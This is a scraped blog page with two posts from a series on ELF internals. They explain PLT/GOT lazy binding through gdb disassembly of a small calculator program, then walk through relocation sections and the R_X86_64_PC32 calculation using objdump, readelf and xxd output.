Essentially, the Global Offset Table (GOT) is a table of resolved addresses (for example, of functions in libc), while the PLT is a set of small code stubs that the call sites in the .text section of the calc binary jump to.\nBy utilizing this combination of the PLT and the .got.plt section, there\u0026rsquo;s no need to directly patch the .text section of the calc binary. This approach offers security benefits as it avoids modifying the executable code, which could potentially introduce vulnerabilities or trigger security mechanisms designed to detect such modifications.\nSecurity benefits ++\nAnalysis It will become clearer when we examine the disassembly (which is my favorite part).\nAs usual, we\u0026rsquo;ll disassemble the main function first. We don\u0026rsquo;t have to check everything here, just focus on the printf and scanf call instructions.\n0x000055555555518f \u0026lt;+38\u0026gt;: call 0x555555555050 \u0026lt;printf@plt\u0026gt; 0x00005555555551b2 \u0026lt;+73\u0026gt;: call 0x555555555060 \u0026lt;__isoc99_scanf@plt\u0026gt; The interesting thing to note here is that they point to addresses which are just 0x555555555060 - 0x555555555050 = 16 bytes away from each other. 
I\u0026rsquo;m sure none of these functions can be defined in just 16 bytes.\nThese are PLT stubs, the area that the .text section refers to for all calls into dynamically linked libraries.\n(gdb) x/3i 0x555555555050 0x555555555050 \u0026lt;printf@plt\u0026gt;: jmp QWORD PTR [rip+0x2fba] # 0x555555558010 \u0026lt;printf@got.plt\u0026gt; 0x555555555056 \u0026lt;printf@plt+6\u0026gt;: push 0x2 0x55555555505b \u0026lt;printf@plt+11\u0026gt;: jmp 0x555555555020 (gdb) x/3i 0x555555555060 0x555555555060 \u0026lt;__isoc99_scanf@plt\u0026gt;: jmp QWORD PTR [rip+0x2fb2] # 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt; 0x555555555066 \u0026lt;__isoc99_scanf@plt+6\u0026gt;: push 0x3 0x55555555506b \u0026lt;__isoc99_scanf@plt+11\u0026gt;: jmp 0x555555555020 If you examine the first instruction in each stub, you\u0026rsquo;ll notice that they jump through memory locations 0x555555558010 and 0x555555558018 respectively, which are Global Offset Table (GOT) entries. These entries are meant to hold the addresses of the actual functions from the dynamic libraries. You can inspect these locations to find where the first instruction in the PLT stub is directing the jump to.\n(gdb) x/1x 0x555555558010 0x555555558010 \u0026lt;printf@got.plt\u0026gt;: 0x55555056 (gdb) x/1x 0x555555558018 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt;: 0x55555066 Alright, since we\u0026rsquo;re using these functions for the first time, the steps of finding the function\u0026rsquo;s address and storing it in the Global Offset Table haven\u0026rsquo;t been completed yet (which is part of the lazy binding logic). So, the program jumps to the next instruction of the stub instead. Note that x/1x prints only the low 4 bytes here: 0x55555056 and 0x55555066 are the tails of 0x555555555056 and 0x555555555066 respectively.\nThe next instruction in each PLT stub pushes a number (the index of that symbol\u0026rsquo;s relocation entry) onto the stack\u0026hellip; and then both of the PLT stubs jump to the same address \u0026ndash; 0x555555555020. 
This is the address that triggers the dynamic symbol resolution process.\n(gdb) x/3i 0x555555555020 =\u0026gt; 0x555555555020: push QWORD PTR [rip+0x2fca] # 0x555555557ff0 0x555555555026: jmp QWORD PTR [rip+0x2fcc] # 0x555555557ff8 0x55555555502c: nop DWORD PTR [rax+0x0] It pushes the value stored at 0x555555557ff0 onto the stack and then jumps to the address stored at 0x555555557ff8, which is actually the _dl_runtime_resolve_xsavec function in our dynamic linker (/lib64/ld-linux-x86-64.so.2). This function resolves the address of the requested function (printf or scanf) and then patches its GOT entry.\nOnce that is done, you can check the patched entries in the GOT (again, only the low 4 bytes are shown)\n(gdb) x/1x 0x555555558010 0x555555558010 \u0026lt;printf@got.plt\u0026gt;: 0xf7e16730 (gdb) x/1x 0x555555558018 0x555555558018 \u0026lt;__isoc99_scanf@got.plt\u0026gt;: 0xf7e16430 Now, these are the real addresses for the printf and scanf functions within the calc program\u0026rsquo;s memory space. With this completed, whenever calc needs to use printf or scanf, their addresses will already be stored in the GOT, which can be accessed by the corresponding PLT stubs.\nConclusion In conclusion, dynamic linking plays a crucial role in how programs interact with shared libraries in Linux systems. By utilizing mechanisms like the Procedure Linkage Table (PLT) and the Global Offset Table (GOT), programs can efficiently access functions from shared libraries at runtime. This process involves lazy binding, where function addresses are resolved and stored in the GOT only when they are first called, optimizing performance and memory usage. Through this approach, programs like calc can seamlessly utilize functions like printf and scanf without the need for manual intervention or redundant loading of shared libraries. 
Overall, dynamic linking provides a flexible and efficient way for programs to access external functionality, enhancing the functionality and usability of software on Linux platforms.\nResources https://developer.ibm.com/tutorials/l-dynamic-libraries/ https://opensource.com/article/22/5/dynamic-linking-modular-libraries-linux https://www.baeldung.com/cs/dynamic-linking-vs-dynamic-loading#2-dynamic-linking\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.baeldung.com/cs/dynamic-linking-vs-dynamic-loading#loading\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2024/04/elf-chronicles-plt-got/","summary":"Intro In earlier articles, we talked about various parts of an ELF file and the many steps needed to create an executable ELF file that can run on your computer.\n(Note: The steps are shown visually below; For the source code, check out the symbol table article in this series.)\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.","title":"Elf Chronicles: PLT/GOT (7/?)"},{"content":"In previous article about Symbol Tables, we talked about the below diagram \u0026hellip;.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ 
┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ \u0026hellip;and how the compiler was unaware of the final addresses for many symbols. When things get a bit confusing for the compiler, it takes the easy route by putting zeros in the addresses and creating relocation entries for the linker/loader to sort out.\nThe linker combines all the .o files, causing changes to the positions of different parts. For example, the main function in main.o and addFunc in libarithmatic.o both start off at position 0x0. But when you link these files, this setup causes issues, so some tweaks are needed.\nIn this situation, the compiler and assembler team up to produce the .o file, but they don\u0026rsquo;t know for sure where each part will end up in the eventual calc binary. So, they play it safe by leaving these spots empty and make notes in the relocations section. This tells the linker that these positions need some adjustments later on.\nRelocations According to ELF specification (version 1.2)\nRelocation is the process of connecting symbolic references with symbolic definitions.\nRelocation is a straightforward concept in coding. When you\u0026rsquo;re compiling code, the compiler doesn\u0026rsquo;t always know the exact addresses for everything in the program. ELF relocations become important when the addresses of symbols are uncertain during compilation, often because the final addresses are determined by the linker or loader at a later stage. 
It\u0026rsquo;s similar to arranging pieces in a puzzle without having all the details upfront.\n## Before linking - main.o ❯ objdump -M intel -D -j .text main.o | grep call 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; ## After linking - calc ❯ objdump -M intel -D -j .text calc | grep call 1138: e8 63 ff ff ff call 10a0 \u0026lt;_start+0x30\u0026gt; 118f: e8 bc fe ff ff call 1050 \u0026lt;printf@plt\u0026gt; 11b2: e8 a9 fe ff ff call 1060 \u0026lt;__isoc99_scanf@plt\u0026gt; 11ef: e8 b8 00 00 00 call 12ac \u0026lt;addFunc\u0026gt; 120c: e8 b5 00 00 00 call 12c6 \u0026lt;subFunc\u0026gt; 1229: e8 b2 00 00 00 call 12e0 \u0026lt;mulFunc\u0026gt; 1246: e8 af 00 00 00 call 12fa \u0026lt;divFunc\u0026gt; 125e: e8 cd fd ff ff call 1030 \u0026lt;puts@plt\u0026gt; 128c: e8 bf fd ff ff call 1050 \u0026lt;printf@plt\u0026gt; 12a5: e8 96 fd ff ff call 1040 \u0026lt;__stack_chk_fail@plt\u0026gt; Now, there are three essential elements needed for relocation to take place:\nThe spot where the adjustment needs to be made. The symbol that\u0026rsquo;s part of the adjustment. An algorithm specifying how to calculate and apply the necessary fix. The compiler stores all this information in a special section identified by type - either REL (0x9) or RELA (0x4).\nREL is used for basic relocation entries. RELA is essentially the same as REL, but with an extra addend value. This doesn\u0026rsquo;t significantly impact the concept, though. 
You can easily identify these sections using readelf;\u0026hellip;\n❯ readelf --section-headers --wide main.o There are 14 section headers, starting at offset 0x5a8: Section Headers: [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 0] NULL 0000000000000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 0000000000000000 000040 000143 00 AX 0 0 1 [ 2] .rela.text RELA 0000000000000000 0003e0 000138 18 I 11 1 8 [ 3] .data PROGBITS 0000000000000000 000183 000000 00 WA 0 0 1 [ 4] .bss NOBITS 0000000000000000 000183 000000 00 WA 0 0 1 [ 5] .rodata PROGBITS 0000000000000000 000183 000041 00 A 0 0 1 [ 6] .comment PROGBITS 0000000000000000 0001c4 00001c 01 MS 0 0 1 [ 7] .note.GNU-stack PROGBITS 0000000000000000 0001e0 000000 00 0 0 1 [ 8] .note.gnu.property NOTE 0000000000000000 0001e0 000030 00 A 0 0 8 [ 9] .eh_frame PROGBITS 0000000000000000 000210 000038 00 A 0 0 8 [10] .rela.eh_frame RELA 0000000000000000 000518 000018 18 I 11 9 8 [11] .symtab SYMTAB 0000000000000000 000248 000138 18 12 4 8 [12] .strtab STRTAB 0000000000000000 000380 000059 00 0 0 1 [13] .shstrtab STRTAB 0000000000000000 000530 000074 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), L (link order), O (extra OS processing required), G (group), T (TLS), C (compressed), x (unknown), o (OS specific), E (exclude), D (mbind), l (large), p (processor specific) My parser gives me the same results\u0026hellip; (with different looks)\n[ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 01 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x0 Offset: 0x40 Size: 323 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 03 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x0 Offset: 0x183 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 04 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x0 Offset: 0x183 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 05 ] Section Name: .rodata Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x183 Size: 65 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 06 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0x1c4 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 07 ] Section Name: 
.note.GNU-stack Type: 0x1 Flags: 0x0 Addr: 0x0 Offset: 0x1e0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 08 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x0 Offset: 0x1e0 Size: 48 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 09 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x210 Size: 56 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 10 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x518 Size: 24 Link: 11 Info: 0x9 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 12 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x380 Size: 89 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 13 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x530 Size: 116 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- In any case, identifying the relocation sections is straightforward \u0026ndash; REL (0x9) or RELA (0x4).\n# From readelf [Nr] Name Type Address Off Size ES Flg Lk Inf Al [ 2] .rela.text RELA 0000000000000000 0003e0 000138 18 I 11 1 8 [10] .rela.eh_frame RELA 0000000000000000 000518 000018 18 I 11 9 8 # From my parser [ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [ 10 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x518 Size: 24 Link: 11 Info: 0x9 Addralign: 0x8 Entsize: 24 ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- (Note: To keep things clear in this article and to maintain simplicity, we\u0026rsquo;re going to ignore the .rela.eh_frame. We can dive into that particular aspect another time.)\nWe can use the details shared earlier to pinpoint the real data of the relocation section. 
This means we\u0026rsquo;ll be finding the section data by using the section header entry \u0026ndash; a process we\u0026rsquo;ve gone through multiple times before.\n[ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 ┌─────────Offset: 0x3e0 │ ┌──Size: 312 │ │ Link: 11 │ │ Info: 0x1 │ │ Addralign: 0x8 │ │ Entsize: 24 │ │ │ │ │ │ │ │ │ ▼ ▼ ▼ ❯ xxd -s 0x3e0 -l 0x138 -c 0x18 main.o | nl -v0 - 0 000003e0: 1a00 0000 0000 0000 0200 0000 0300 0000 fcff ffff ffff ffff ........................ 1 000003f8: 2700 0000 0000 0000 0400 0000 0500 0000 fcff ffff ffff ffff \u0026#39;....................... 2 00000410: 3d00 0000 0000 0000 0200 0000 0300 0000 1500 0000 0000 0000 =....................... 3 00000428: 4a00 0000 0000 0000 0400 0000 0600 0000 fcff ffff ffff ffff J....................... 4 00000440: 8700 0000 0000 0000 0400 0000 0700 0000 fcff ffff ffff ffff ........................ 5 00000458: a400 0000 0000 0000 0400 0000 0800 0000 fcff ffff ffff ffff ........................ 6 00000470: c100 0000 0000 0000 0400 0000 0900 0000 fcff ffff ffff ffff ........................ 7 00000488: de00 0000 0000 0000 0400 0000 0a00 0000 fcff ffff ffff ffff ........................ 8 000004a0: ee00 0000 0000 0000 0200 0000 0300 0000 1e00 0000 0000 0000 ........................ 9 000004b8: f600 0000 0000 0000 0400 0000 0b00 0000 fcff ffff ffff ffff ........................ 10 000004d0: 1701 0000 0000 0000 0200 0000 0300 0000 2f00 0000 0000 0000 ................/....... 11 000004e8: 2401 0000 0000 0000 0400 0000 0500 0000 fcff ffff ffff ffff $....................... 12 00000500: 3d01 0000 0000 0000 0400 0000 0c00 0000 fcff ffff ffff ffff =....................... 
Linux kernel has some specific structures to define REL and RELA entries\u0026hellip;.\n/* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L171 */ typedef struct elf64_rel { Elf64_Addr r_offset;\t/* Location at which to apply the action */ Elf64_Xword r_info;\t/* index and type of relocation */ } Elf64_Rel; /* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L182 */ typedef struct elf64_rela { Elf64_Addr r_offset;\t/* Location at which to apply the action */ Elf64_Xword r_info;\t/* index and type of relocation */ Elf64_Sxword r_addend;\t/* Constant addend used to compute value */ } Elf64_Rela; /* https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/elf.h#L163 */ #define ELF64_R_SYM(i)\t((i) \u0026gt;\u0026gt; 32) #define ELF64_R_TYPE(i)\t((i) \u0026amp; 0xffffffff) After parsing this section\u0026rsquo;s data, I got following results.\n[ 02 ] Section Name: .rela.text Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x3e0 Size: 312 Link: 11 Info: 0x1 Addralign: 0x8 Entsize: 24 [ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 [ 1 ] Offset: 0x27 Info: 0x000500000004 (Sym: 0x5 | Type: 0x4) Addend: -4 [ 2 ] Offset: 0x3d Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 21 [ 3 ] Offset: 0x4a Info: 0x000600000004 (Sym: 0x6 | Type: 0x4) Addend: -4 [ 4 ] Offset: 0x87 Info: 0x000700000004 (Sym: 0x7 | Type: 0x4) Addend: -4 [ 5 ] Offset: 0xa4 Info: 0x000800000004 (Sym: 0x8 | Type: 0x4) Addend: -4 [ 6 ] Offset: 0xc1 Info: 0x000900000004 (Sym: 0x9 | Type: 0x4) Addend: -4 [ 7 ] Offset: 0xde Info: 0x000a00000004 (Sym: 0xa | Type: 0x4) Addend: -4 [ 8 ] Offset: 0xee Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 30 [ 9 ] Offset: 0xf6 Info: 0x000b00000004 (Sym: 0xb | Type: 0x4) Addend: -4 [ 10 ] Offset: 0x117 Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: 47 [ 11 ] Offset: 0x124 Info: 0x000500000004 (Sym: 0x5 | Type: 0x4) Addend: -4 [ 12 ] Offset: 0x13d Info: 0x000c00000004 (Sym: 0xc | Type: 0x4) 
Addend: -4 Let\u0026rsquo;s pause for a moment to grasp the significance of each member in this structure and how it aids the linker in the relocation process.\n(👇 Shamelessly stolen from man 5 elf 👇)\nr_offset This member gives the location at which to apply the relocation.\nFor a relocatable file, the value is the byte offset from the beginning of the section where relocation is to be applied. For an executable file or shared object, the value is the virtual address of the storage unit affected by the relocation. r_info This member gives both the symbol table index with respect to which the relocation must be made and the type of relocation to apply. (The Linux kernel headers provide two macros to pull these values out of it: ELF64_R_SYM and ELF64_R_TYPE)\nr_addend This member specifies a constant addend used to compute the value to be stored into the relocatable field.\nAnalysis Now armed with the theoretical knowledge, let\u0026rsquo;s delve into how the linker utilizes this information to perform a relocation. We\u0026rsquo;ll begin by examining the details of the first relocation entry.\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 Now there are 2 things I want you to think about before we even start with the relocation process\u0026hellip;\nWe know r_offset holds the offset from the beginning of the section where relocation is to be applied. Which section is that here?? And ELF64_R_SYM from r_info gives an index into the symbol table. But we can obviously have more than 1 symbol table, so which symbol table are we talking about here??
Answer \u0026raquo; To identify that, you just have to check sh_info and sh_link members from the section header entry.\nIn our case, the associated symbol table and the section where relocations will apply can be viewed like this:-\n┌────────────────────────────────────┐ │ [ 11 ] Section Name: .symtab │◄───────┐ │ Type: 0x2 │ │ │ Flags: 0x0 │ │ │ Addr: 0x0 │ │ │ Offset: 0x248 │ │ │ Size: 312 │ │ │ Link: 12 │ │ │ Info: 0x4 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ └────────────────────────────────────┘ │ │ /* all the symbols associated │ are in section 11 */ │ │ │ ┌────────────────────────────────────┐ │ │ [ 02 ] Section Name: .rela.text │ │ │ Type: 0x4 │ │ │ Flags: 0x40 │ │ │ Addr: 0x0 │ │ │ Offset: 0x3e0 │ │ │ Size: 312 │ │ │ Link: 11 ─────────────────┼────────┘ ┌───────┼───────── Info: 0x1 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ └────────────────────────────────────┘ │ │ │ /* relocations apply to section with index 1 */ │ │ ┌───────────────────────────────────┐ └──────►│ [ 01 ] Section Name: .text │ │ Type: 0x1 │ │ Flags: 0x6 │ │ Addr: 0x0 │ │ Offset: 0x40 │ │ Size: 323 │ │ Link: 0 │ │ Info: 0x0 │ │ Addralign: 0x1 │ │ Entsize: 0 │ │ │ └───────────────────────────────────┘ Traditionally, the chosen naming scheme for the relocation section indicates the section where relocations are intended to be applied. For example, if relocations are to be applied on .text section, then the relocation entries will be under .rela.text or .rel.text. However, it\u0026rsquo;s crucial to note that this is merely a tradition and not a strict requirement.\nIn the wisdom of ancient gods, it is advised not to depend solely on names.\nNow that you know where to apply relocation and where to look for symbols\u0026hellip; let\u0026rsquo;s look at the relocation entry we started with\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 We can now understand that:\nThe relocation is to be applied at offset 0x1a in .text section. 
The symbol associated with this relocation is 3rd symbol in .symtab section. So, if you want to see the big picture,\n┌────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐ │ [ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 │ │ [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 │ │ [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 │ ┌─────┼────► [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 │ │ │ [ 4 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 │ │ │ [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 9 ] Name: mulFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 10 ] Name: divFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 11 ] Name: puts Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ [ 12 ] Name: __stack_chk_fail Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 │ │ │ │ │ 
└────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘ │ └──────────────────────────────────────────────────────────┐ │ │ │ │ │ [ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 │ │ │ │ └─────────────────────────┐ │ │ ┌────────────────────────────────┼───────────────────────────────────────────────────┐ │ │ │ │ Disassembly of section .text:│ │ │ │ │ │ 0000000000000000 \u0026lt;main\u0026gt;: │ │ │ 0: 55 │ push rbp │ │ 1: 48 89 e5 │ mov rbp,rsp │ │ 4: 48 83 ec 20 │ sub rsp,0x20 │ │ 8: 64 48 8b 04 25 28 00 │ mov rax,QWORD PTR fs:0x28 │ │ f: 00 00 ┌──┘ │ │ 11: 48 89 45 f8 ▼ mov QWORD PTR [rbp-0x8],rax │ │ 15: 31 c0 ┌───────────┐ xor eax,eax │ │ 17: 48 8d 05│00 00 00 00│ lea rax,[rip+0x0] # 1e \u0026lt;main+0x1e\u0026gt; │ │ 1e: 48 89 c7└───────────┘ mov rdi,rax │ │ 21: b8 00 00 00 00 mov eax,0x0 │ │ 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; │ │ 2b: 48 8d 4d f0 lea rcx,[rbp-0x10] │ │ │ └────────────────────────────────────────────────────────────────────────────────────┘ I get that things might look like a mess, a real puzzle at first. But trust me, with a bit of experience, you\u0026rsquo;ll start to figure it out.\nNow that we\u0026rsquo;ve uncovered the secret behind the symbol and pinpointed where the relocation is going to happen, it\u0026rsquo;s time to figure out the algorithm we\u0026rsquo;re going to use for relocation. Just peek into the Type part of r_info. 
In our case, it\u0026rsquo;s holding the number 0x2.\nWith a quick look at the glibc source code (elf.h), I can tell you that this algorithm is R_X86_64_PC32\u0026hellip; And another brief look at the source code of mold (a modern linker) helps me fully comprehend the algorithm\u0026hellip;\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l3579 */ #define R_X86_64_PC32 2 /* PC relative 32 bit signed */ /* https://github.com/rui314/mold/blob/main/elf/arch-x86-64.cc#L433C1-L436C13 */ case R_X86_64_PC32: case R_X86_64_PLT32: write32s(S + A - P); break; Alright, so the magical spell for this relocation is S + A - P\u0026hellip;. Now, let\u0026rsquo;s break it down\nS = value of symbol A = Addend (r_addend) P = place of relocation (r_offset is used to calculate this) The addend (A) is simply -4. Why -4?? Because x86-64 measures a PC-relative displacement from the address of the next instruction, not from the 4-byte field being patched. In these lea and call instructions that field is the last 4 bytes of the instruction, so the next instruction sits at P + 4, and the value we really want is S - (P + 4), which is the same thing as S + (-4) - P. You can check this against the linked calc from earlier: the call to addFunc sits at 0x11ef, so its 4-byte operand is at P = 0x11f0, addFunc landed at S = 0x12ac, and 0x12ac - 4 - 0x11f0 = 0xb8, exactly the e8 b8 00 00 00 we saw in the disassembly.\nAnd the place of relocation (P) should be 0x1a\u0026hellip; right? WRONG!!\u0026hellip; the place of relocation will be location of .text section + 0x1a.
Linker will know where .text will be after the merge process, so it\u0026rsquo;ll be easy for the linker to get the exact location.\nFinally, value of symbol (S), this one is a bit tricky here\u0026hellip; You need to take a look at the symbol table for this\n[ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: main Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x143 [ 5 ] Name: printf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 6 ] Name: __isoc99_scanf Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 7 ] Name: addFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 8 ] Name: subFunc Info: 0x16 (Bind: 0x1 | Type: 0x0) Other: 0x0 